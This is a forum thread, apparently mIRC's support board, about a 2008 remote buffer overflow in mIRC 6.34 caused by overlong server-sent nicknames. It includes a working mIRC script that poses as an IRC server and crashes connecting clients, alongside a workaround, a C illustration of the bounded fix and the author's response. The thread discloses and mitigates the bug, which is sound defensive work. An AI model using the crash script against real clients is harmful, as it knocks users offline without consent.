Mirc 6.34 Remote Buffer Overflow #204830 03/10/08 08:38 AM
emm1 (Mostly harmless; Joined: Oct 2008; Posts: 1)
Hello, I was just notified of this bug here. Hopefully someone can address it quickly.

http://www.milw0rm.com/exploits/6654

Re: Mirc 6.34 Remote Buffer Overflow [Re: emm1] #204831 03/10/08 11:05 AM
Collective (Hoopy frood; Joined: Dec 2002; Posts: 3,138)
Confirmed, crashes a clean mIRC 6.34.

Re: Mirc 6.34 Remote Buffer Overflow [Re: emm1] #204832 03/10/08 11:36 AM
Khaled (Hoopy frood; Joined: Dec 2002; Posts: 4,829)
This is a server-based exploit, not a user-based exploit, so as long as you're connecting to a trusted IRC network, such as one of the major networks, you should be fine.

That said, I can't seem to reproduce this issue here so far, neither in a clean install of the release version nor in a debug version of mIRC.

When I test the perl script and make mIRC connect to the local perl server, nothing happens, other than a disconnect from the server because the server sequence is incorrect.

When I test the same string sequence using internal debugging in mIRC, again nothing happens other than mIRC opening a query window to that user.

I'll continue to try to reproduce this issue and if verified I should have an update out shortly.

Re: Mirc 6.34 Remote Buffer Overflow [Re: Khaled] #204867 04/10/08 12:53 PM
Pivo (Babel fish; Joined: Jun 2008; Posts: 58)
That Perl script is crashing both my modified and my clean installation of mIRC.
[Screenshot]
Windows XP Service Pack 3, mIRC 6.34, ...

Edit: I have translated this into an mIRC script, for easier testing...
To start listening, type /crash ...
Code:
alias crash {
  ; check for open sockets
  if ($sock(crashing*)) {
    sockclose crashing*
    echo -sgt Crash-Sockets closed.
    return
  }

  ; determining port
  var %p = 6667
  while (!$portfree(%p) && %p <= 65535) { inc %p }
  if (%p >= 65536) { echo -sgt ERROR: Socket could not be created. | return }

  ; listening
  socklisten crashing %p
  if (!$sock(crashing)) { echo -sgt ERROR: Socket could not be created. | return }
  echo -sgt Crash-Socket listening...
  echo -sgt Type 04/server localhost %p $+  to crash mirc.
}

on *:socklisten:crashing: {
  var %s = crashing. $+ $ticks
  sockaccept %s
  sockwrite -n %s :irc_server.stuff 001 yow :Welcome to the Internet Relay Network yow
  sockwrite -n %s $+(:,$str(A,313),CC) PRIVMSG yow : /FINGER yow.
  echo -sgt Sending crash-message to $sock(%s).ip
  .timer 1 3 sockclose %s
}

Last edited by Pivo; 04/10/08 03:30 PM.
Re: Mirc 6.34 Remote Buffer Overflow [Re: Pivo] #204892 05/10/08 12:58 AM
DONGS (Mostly harmless; Joined: Oct 2008; Posts: 1)

Re: Mirc 6.34 Remote Buffer Overflow [Re: Khaled] #204899 05/10/08 10:24 AM
Sat (Hoopy frood; Joined: Apr 2004; Posts: 853)
The problem is with the sprintf(buf, "f%s", nick); in the code that gets the font for the new query window from mirc.ini: buf is 300 bytes, nick is taken directly from the server.

Temporary workaround until the new mIRC is out:
Code:
on ^*:OPEN:?:*:if ($len($nick) > 298) halt

Other, more invasive workarounds: use a dedicated query window, put queries on ignore, etc.
Saturn, QuakeNet staff
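An added illustration, in C, of the overflow pattern Sat describes and the bounded replacement a fix would use. This is example code written for this page, not mIRC's source and not code from anyone in the thread. The 300-byte buffer and the "f%s" format come from Sat's description; the function names (build_font_key, nick_fits, probe_nick_len) and the 313-byte test nick (the length Pivo's script sends) are assumptions of the example.

```c
#include <stdio.h>
#include <string.h>

/* Size of the font-key buffer described in the thread (300 bytes). */
#define FONT_KEY_BUF_SIZE 300

/*
 * Vulnerable pattern as described in the thread: an unbounded sprintf of a
 * server-supplied nick into a fixed 300-byte buffer. Reproduced here as a
 * comment for contrast only; nothing below calls it.
 *
 *     char buf[300];
 *     sprintf(buf, "f%s", nick);
 */

/*
 * Hardened form (assumed names, not mIRC's own code): build the "f<nick>"
 * key with snprintf and check its return value. snprintf reports the length
 * the full string would have had, so n >= bufsize means the nick did not fit;
 * the key is then rejected rather than truncated or written past the buffer.
 * Returns 1 if the key was built, 0 if the nick was rejected.
 */
int build_font_key(char *buf, size_t bufsize, const char *nick) {
    int n = snprintf(buf, bufsize, "f%s", nick);
    if (n < 0 || (size_t)n >= bufsize) {
        if (bufsize > 0) buf[0] = '\0';   /* never hand back a partial key */
        return 0;
    }
    return 1;
}

/*
 * Input-side check equivalent to Sat's workaround ($len($nick) > 298):
 * "f" + nick + terminating NUL must fit in 300 bytes, so the longest
 * acceptable nick is 298 bytes.
 */
int nick_fits(const char *nick) {
    return strlen(nick) <= FONT_KEY_BUF_SIZE - 2;
}

/*
 * Probe helper: builds a constructed nick of `len` 'A' characters (the
 * script in the thread uses 313) and reports whether build_font_key
 * accepts it. Returns -1 if len is outside the probe's own buffer.
 */
int probe_nick_len(size_t len) {
    char nick[1024];
    char buf[FONT_KEY_BUF_SIZE];
    if (len >= sizeof nick) return -1;
    memset(nick, 'A', len);
    nick[len] = '\0';
    return build_font_key(buf, sizeof buf, nick);
}

int main(void) {
    size_t lens[] = { 3, 298, 299, 313 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("nick of %zu bytes: %s\n", lens[i],
               probe_nick_len(lens[i]) ? "accepted" : "rejected");
    return 0;
}
```

The boundary matters: a 298-byte nick is the last one that fits ("f" + 298 bytes + NUL = 300), which is exactly why Sat's script halts on $len($nick) > 298; a 299-byte nick is already rejected by the bounded version, and the 313-byte nick from the script never reaches the buffer.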
Re: Mirc 6.34 Remote Buffer Overflow [Re: Sat] #204962 07/10/08 05:15 PM
Khaled (Hoopy frood; Joined: Dec 2002; Posts: 4,829)
Thanks, I have been able to reproduce this issue and should have an update ready for release soon. In the meantime, the above script-based fix posted by Sat resolves the issue, as does enabling the "Use single message window" option in the mIRC Options/IRC dialog.

Re: Mirc 6.34 Remote Buffer Overflow [Re: Khaled] #204965 07/10/08 09:59 PM
Trashlord_ (Babel fish; Joined: Oct 2007; Posts: 51)
Just wanted to add that I have tested this under WINE in Linux, and mIRC crashes there as well.